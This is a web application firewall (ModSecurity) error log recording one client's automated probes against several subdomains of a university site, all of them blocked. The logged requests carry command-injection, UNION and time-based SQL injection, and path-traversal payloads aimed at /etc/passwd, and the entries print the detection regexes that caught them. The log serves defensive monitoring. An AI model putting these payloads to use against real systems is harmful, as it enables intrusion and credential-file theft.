[Tue Aug 29 11:35:31.411483 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/nette.micro/"] [unique_id "ZO11k8Co-f0AAASEJa8AAAAE"]
[Tue Aug 29 11:35:31.441627 2023] [:error] [pid 1402] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat${ifs}/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/network_test.php"] [unique_id "ZO11k8Co-f0AAAV6LBgAAAAI"]
[Tue Aug 29 11:35:32.300772 2023] [:error] [pid 1359] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id_form. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id_form: 1 UNION ALL SELECT NULL,NULL,md5(999999999),NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lMCo-f0AAAVPX5gAAAAF"]
[Tue Aug 29 11:35:32.304331 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:data_target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:data_target: vote_score = 1 AND (SELECT 3 FROM (SELECT(SLEEP(6)))gwe)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lMCo-f0AAASI0HYAAAAG"]
[Tue Aug 29 11:35:32.305241 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../home/talariuser/www/app/webroot/files/2UdxkuPYBktPaU9ruKB9Vm8sOw9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/Collector/appliancesettings/applianceSettingsFileTransfer"] [unique_id "ZO11lMCo-f0AAAN5YJQAAAAN"]
[Tue Aug 29 11:35:32.312069 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/nette.micro/"] [unique_id "ZO11lMCo-f0AAAUKhC8AAABC"]
[Tue Aug 29 11:35:32.317015 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id_form. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id_form: 1 UNION ALL SELECT NULL,NULL,md5(999999999),NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lMCo-f0AAASOUs0AAAAR"]
[Tue Aug 29 11:35:32.318853 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:data_target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:data_target: vote_score = 1 AND (SELECT 3 FROM (SELECT(SLEEP(6)))gwe)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lMCo-f0AAAT2JUIAAAAz"]
[Tue Aug 29 11:35:32.320116 2023] [:error] [pid 1361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/nette.micro/"] [unique_id "ZO11lMCo-f0AAAVRxfkAAAAQ"]
[Tue Aug 29 11:35:32.320367 2023] [:error] [pid 1384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/nette.micro/"] [unique_id "ZO11lMCo-f0AAAVoCCIAAAAY"]
[Tue Aug 29 11:35:32.329282 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:data_target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:data_target: vote_score = 1 AND (SELECT 3 FROM (SELECT(SLEEP(6)))gwe)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lMCo-f0AAAUbg3kAAABQ"]
[Tue Aug 29 11:35:32.332880 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id_form. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id_form: 1 UNION ALL SELECT NULL,NULL,md5(999999999),NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lMCo-f0AAAUKhDAAAABC"]
[Tue Aug 29 11:35:32.333494 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/nette.micro/"] [unique_id "ZO11lMCo-f0AAAPDoToAAAAP"]
[Tue Aug 29 11:35:32.334751 2023] [:error] [pid 1248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../home/talariuser/www/app/webroot/files/2UdxkuPYBktPaU9ruKB9Vm8sOw9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/Collector/appliancesettings/applianceSettingsFileTransfer"] [unique_id "ZO11lMCo-f0AAATge@0AAAAl"]
[Tue Aug 29 11:35:32.334762 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id_form. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id_form: 1 UNION ALL SELECT NULL,NULL,md5(999999999),NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lMCo-f0AAATOBBAAAAAH"]
[Tue Aug 29 11:35:32.335582 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../home/talariuser/www/app/webroot/files/2UdxkuPYBktPaU9ruKB9Vm8sOw9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Collector/appliancesettings/applianceSettingsFileTransfer"] [unique_id "ZO11lMCo-f0AAATQXksAAAAO"]
[Tue Aug 29 11:35:32.339626 2023] [:error] [pid 1384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/nette.micro/"] [unique_id "ZO11lMCo-f0AAAVoCCMAAAAY"]
[Tue Aug 29 11:35:32.340523 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:data_target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:data_target: vote_score = 1 AND (SELECT 3 FROM (SELECT(SLEEP(6)))gwe)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lMCo-f0AAAUJI1sAAABB"]
[Tue Aug 29 11:35:32.341004 2023] [:error] [pid 1359] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:data_target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:data_target: vote_score = 1 AND (SELECT 3 FROM (SELECT(SLEEP(6)))gwe)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lMCo-f0AAAVPX5oAAAAF"]
[Tue Aug 29 11:35:32.361064 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../home/talariuser/www/app/webroot/files/2UdxkuPYBktPaU9ruKB9Vm8sOw9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/Collector/appliancesettings/applianceSettingsFileTransfer"] [unique_id "ZO11lMCo-f0AAATWYVUAAAAa"]
[Tue Aug 29 11:35:33.309156 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:arp_template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:arp_template_id: 1 AND (SELECT 8948 FROM (SELECT(SLEEP(6)))iIic)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lcCo-f0AAATQXkwAAAAO"]
[Tue Aug 29 11:35:33.312152 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:arp_template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:arp_template_id: 1 AND (SELECT 8948 FROM (SELECT(SLEEP(6)))iIic)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lcCo-f0AAAUR880AAABI"]
[Tue Aug 29 11:35:33.321008 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:data_target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:data_target: vote_score = 1 AND (SELECT 3 FROM (SELECT(SLEEP(6)))gwe)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lcCo-f0AAATOBBEAAAAH"]
[Tue Aug 29 11:35:33.329542 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id_form. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id_form: 1 UNION ALL SELECT NULL,NULL,md5(999999999),NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lcCo-f0AAAPDoTsAAAAP"]
[Tue Aug 29 11:35:33.343355 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id_form. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id_form: 1 UNION ALL SELECT NULL,NULL,md5(999999999),NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lcCo-f0AAATWYVcAAAAa"]
[Tue Aug 29 11:35:33.352675 2023] [:error] [pid 1384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:arp_template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:arp_template_id: 1 AND (SELECT 8948 FROM (SELECT(SLEEP(6)))iIic)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lcCo-f0AAAVoCCUAAAAY"]
[Tue Aug 29 11:35:33.361746 2023] [:error] [pid 984] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:arp_template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:arp_template_id: 1 AND (SELECT 8948 FROM (SELECT(SLEEP(6)))iIic)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lcCo-f0AAAPY1tQAAAAh"]
[Tue Aug 29 11:35:33.381514 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:arp_template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:arp_template_id: 1 AND (SELECT 8948 FROM (SELECT(SLEEP(6)))iIic)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lcCo-f0AAASOUtEAAAAR"]
[Tue Aug 29 11:35:34.300780 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/cab-fare-calculator/tblight.php"] [unique_id "ZO11lsCo-f0AAASEJbUAAAAE"]
[Tue Aug 29 11:35:34.301104 2023] [:error] [pid 1391] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/cab-fare-calculator/tblight.php"] [unique_id "ZO11lsCo-f0AAAVvlIoAAAAe"]
[Tue Aug 29 11:35:34.301460 2023] [:error] [pid 1402] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/cab-fare-calculator/tblight.php"] [unique_id "ZO11lsCo-f0AAAV6LB8AAAAI"]
[Tue Aug 29 11:35:34.303169 2023] [:error] [pid 1384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/cab-fare-calculator/tblight.php"] [unique_id "ZO11lsCo-f0AAAVoCCcAAAAY"]
[Tue Aug 29 11:35:34.315138 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/cab-fare-calculator/tblight.php"] [unique_id "ZO11lsCo-f0AAATWYVkAAAAa"]
